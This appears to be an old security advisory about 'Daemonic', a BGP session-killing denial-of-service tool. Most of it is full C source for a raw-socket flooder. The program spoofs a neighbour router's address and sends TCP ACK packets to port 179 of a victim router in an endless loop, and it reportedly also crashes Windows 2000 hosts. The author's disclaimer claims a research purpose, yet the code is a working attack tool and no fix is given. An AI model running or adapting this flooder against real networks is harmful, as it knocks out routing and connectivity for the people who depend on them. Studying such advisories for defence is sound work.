COMMAND

    Daemonic

SYSTEMS AFFECTED

    Daemonic

PROBLEM

    J. Oquendo found following.  While  working on a paper on DoS  and
    networking he came up with a BGP session killer which also  seemed
    to crash  my Wintrash2000  laptop.   The code  was chopped  up and
    geared to focus on BGP so its port is set to 179.  Now his  laptop
    wasn't running anything on that port but it still managed to crash
    it after a few minutes...

    Anyways snip to the code maybe you can determine what it is...  Be
    advised however  this is  a functional  BGP DoS  as well.   Odd it
    would crash Windows but it has...

    Daemonic is a theoretical based attack based on the notion that  a
    Neighbor router will ignore another Neighbor when bad  information
    is being sent by default (see Error Code #6 on BGP faq's).   Based
    on the information you gather from one network by sending  spoofed
    packets  as  a  neighbor  router  you  may  be  able  to  kill the
    connection entirely.   Written on  a Ultra  5 running  Linux Zoot,
    this  has  been  compiled  on  Linux,  OpenBSD,  Solaris   without
    problems.

    /*
     * Daemonic is part of the Theories in DoS project which I began earlier this year to introduce
     * routing based attack methods in hopes of finding ways to fix them. This was started as a hobby
     * doc I threw together while I study for my certifications. This is not meant to be used for
     * malicious purposes and I truly do not mean for anyone to use it for those purposes either. This
     * can be used to test theories and find ways of fixing them b4 they become an epidemic. This tool
     * is theoretical and should not be used to break networks but rather find solutions to fix them.
     * Greets to everyone in #unixgods, obecian, qwer7y and tattooman, hale@deviance.org, spikeman,
     * speye, bsd-pat and too many more to list. Super greets to Rajak of the efnet for pointing out
     * deficiencies in my argv values and also pre-testing along with me. Please note this also tends
     * to crash WinDoS 2000 machines whether or not they're running something on port 179... Weird
     * shit but hey thats Microtrash. Coding was chopped up from too many sources to remember so if * something seems familiar please respond and I will add your name if it makes you happy.
     * This theorized DoS is based on the presumption that routers who flood their neighbors will be
     * ignored therefore killing the connection. I plan on tweakning up something to send BGP error
     * code 6's as NEIGHBOR(spoofed) --> NEIGHBOR to see whether or not that would break connectivity.
     * So for all you CCNA, CCIE, CCDP geekazoids, time to throw on some egress filtering since this
     * is not a host based attack sizes should be tweaked for different effects/affects (your choice)
     * If anyone cares to e-mail me with Theoretical Based attacks please feel free to do so...
     * Flames, death threats, pr0n, 0-day, etc should be sent to:
     * J. Oquendo sil@antioffline.com www.antioffline.com/TID Theories in DoS
     * (c) Means nothing to me unless your pointing a gun to my dome
     */
    
    
    #include <stdio.h>
    #include <stdlib.h>
    #include <unistd.h>
    #include <strings.h>
    #include <sys/time.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    
    #ifndef __USE_BSD
    #define __USE_BSD
    
    #endif
    
    #ifndef __FAVOR_BSD
    
    #define __FAVOR_BSD
    
    #endif
    
    #include <netinet/in_systm.h>
    #include <netinet/in.h>
    #include <netinet/ip.h>
    #include <netinet/tcp.h>
    #include <arpa/inet.h>
    #include <netdb.h>
    
    #ifdef LINUX
    #define FIX(x)  htons(x)
    
    #else
    
    #define FIX(x)  (x)
    #endif
    
    struct ip_hdr {
        u_int       ip_hl:4,
                    ip_v:4;
        u_char      ip_tos;
        u_short     ip_len;
        u_short     ip_id;
        u_short     ip_off;
        u_char      ip_ttl;
        u_char      ip_p;
        u_short     ip_sum;
        u_long      saddr, daddr;
    };
    
    struct tcp_hdr {
        u_short     th_sport;
        u_short     th_dport;
        u_long      th_seq;
        u_long      th_syn;
        u_int       th_x2:4,
                    th_off:4;
        u_char      th_flags;
        u_short     th_win;
        u_short     th_sum;
        u_short     th_urp;
    };
    
    struct tcpopt_hdr {
        u_char  type;
        u_char  len;
        u_short value;
    };
    
    struct pseudo_hdr {
        u_long saddr, daddr;
        u_char mbz, ptcl;
        u_short tcpl;
    };
    
    struct packet {
        struct ip/*_hdr*/ ip;
        struct tcphdr tcp;
    };
    
    struct cksum {
        struct pseudo_hdr pseudo;
        struct tcphdr tcp;
    };
    
    struct packet packet;
    struct cksum cksum;
    struct sockaddr_in s_in;
    u_short bgport, bgsize, pps;
    u_long radd;
    u_long sradd;
    int sock;
    
    void usage(char *progname)
    {
        fprintf(stderr, "Usage: %s <radd> <sradd> <bgsize> <number>\n", progname);
        fprintf(stderr, "Ports are set to send and receive on port 179\n");
        fprintf(stderr, "radd:\tAddress of router running BGP [victim]\n");
        fprintf(stderr, "sradd:\tSource address of neighbor router running BGP [attacker]\n");
    
    /*  fprintf(stderr, "bgport:\tBGPort is set to 179 and should not be changed\n"); */
    /* should you want to change this to test other protocols */
    
        fprintf(stderr, "bgsize:\tSize of packet which should be no larger than 1024 should allow for xtra header info thru routes\n");
        fprintf(stderr, "num:\tpulverizations per second\n\n");
        exit(1);
    }
    
    inline u_short in_cksum(u_short *addr, int len)
    {
        register int nleft = len;
        register u_short *w = addr;
        register int sum = 0;
        u_short answer = 0;
         while (nleft > 1)  {
             sum += *w++;
             nleft -= 2;
         }
         if (nleft == 1) {
             *(u_char *)(&answer) = *(u_char *) w;
             sum += answer;
         }
         sum = (sum >> 16) + (sum & 0xffff);
         sum += (sum >> 16);
         answer = ~sum;
         return(answer);
    }
    
    u_long lookup(char *hostname)
    {
        struct hostent *hp;
    
        if ((hp = gethostbyname(hostname)) == NULL) {
           fprintf(stderr, "Silly crackhead... scripts are for kidz\n", hostname);
           exit(1);
        }
    
        return *(u_long *)hp->h_addr;
    }
    
    
    void flooder(void)
    {
        struct timespec ts;
        int i;
    
    
        memset(&packet, 0, sizeof(packet));
    
        ts.tv_sec                   = 0;
        ts.tv_nsec                  = 10;
    
        packet.ip.ip_hl             = 5;
        packet.ip.ip_v              = 4;
        packet.ip.ip_p              = IPPROTO_TCP;
        packet.ip.ip_tos            = 0x40;
        packet.ip.ip_id             = radd;
        packet.ip.ip_len            = FIX(sizeof(packet));
        packet.ip.ip_off            = 0;
        packet.ip.ip_ttl            = 255;
        packet.ip.ip_dst.s_addr     = radd;
    
        packet.tcp.th_flags         = 0;
        packet.tcp.th_win           = htons(65535);
        packet.tcp.th_seq           = random();
        packet.tcp.th_ack           = 0;
        packet.tcp.th_off           = 0;
        packet.tcp.th_urp           = 0;
        packet.tcp.th_dport         = 179;
        cksum.pseudo.daddr          = sradd;
        cksum.pseudo.mbz            = 0;
        cksum.pseudo.ptcl           = IPPROTO_TCP;
        cksum.pseudo.tcpl           = htons(sizeof(struct tcphdr));
    
        s_in.sin_family             = AF_INET;
        s_in.sin_addr.s_addr        = sradd;
        s_in.sin_port               = packet.tcp.th_dport;
    
        for(i=0;;++i) {
        if( !(i&0x3FF) ) {
            packet.tcp.th_sport = 179;
            cksum.pseudo.saddr = packet.ip.ip_src.s_addr = sradd;
            packet.tcp.th_flags = TH_ACK;
            packet.tcp.th_ack   = 31337;
    
        }
        else {
            packet.tcp.th_flags = TH_ACK;
            packet.tcp.th_ack = rand();
        }
           ++packet.ip.ip_id;
           /*++packet.tcp.th_sport*/;
           ++packet.tcp.th_seq;
    
           if (!bgport)
              s_in.sin_port = packet.tcp.th_dport = rand();
    
           packet.ip.ip_sum         = 0;
           packet.tcp.th_sum        = 0;
    
           cksum.tcp                = packet.tcp;
    
           packet.ip.ip_sum         = in_cksum((void *)&packet.ip, 20);
           packet.tcp.th_sum        = in_cksum((void *)&cksum, sizeof(cksum));
    
           if (sendto(sock, &packet, sizeof(packet), 0, (struct sockaddr *)&s_in, sizeof(s_in)) < 0);
    
        }
    }
    
    int main(int argc, char *argv[])
    {
        int on = 1;
    
        printf("Daemonic -  BGP Killer [Theories in DoS] www.AntiOffline.com/TID/ \n\n");
    
        if ((sock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW)) < 0) {
           perror("socket");
           exit(1);
        }
    
        setgid(getgid()); setuid(getuid());
    
        if (argc < 4)
           usage(argv[0]);
    
        if (setsockopt(sock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) < 0)
    
    {
           perror("setsockopt");
           exit(1);
    
        }
    
        srand((time(NULL) ^ getpid()) + getppid());
    
        printf("\nFinding Router\n"); fflush(stdout);
    
        radd        = lookup(argv[1]);
        bgport      = atoi(argv[3]);
        bgsize      = atoi(argv[4]);
        sradd       = lookup(argv[2]);
        printf("Thou shall not kill thy neighbor\n");
    
        flooder();
    
        return 0;
    }

SOLUTION

    Nothing yet.